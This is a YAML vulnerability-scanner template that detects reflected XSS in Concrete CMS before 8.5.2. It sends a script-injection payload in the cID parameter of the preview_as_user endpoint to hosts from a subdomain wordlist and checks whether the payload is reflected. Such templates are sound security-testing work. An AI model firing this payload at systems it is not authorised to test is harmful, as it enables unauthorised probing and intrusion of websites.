id: concrete-xss
info:
  author: shifacyclewla,hackergautam
  description: The Concrete CMS < 8.5.2 is vulnerable to Reflected XSS using cID parameter.
  name: Unauthenticated reflected XSS in preview_as_user function
  severity: medium
  tags: concrete,xss,cms
  reference: |
    - https://hackerone.com/reports/643442
    - https://github.com/concrete5/concrete5/pull/7999
    - https://twitter.com/JacksonHHax/status/1389222207805661187
requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100
    raw:
      - |
        GET /ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert("{{randstr}}")> HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</iframe><svg/onload=alert("{{randstr}}")>'
      - type: word
        part: header
        words:
          - "text/html"
          - "CONCRETE5"
        condition: and
      - type: status
        status:
          - 200
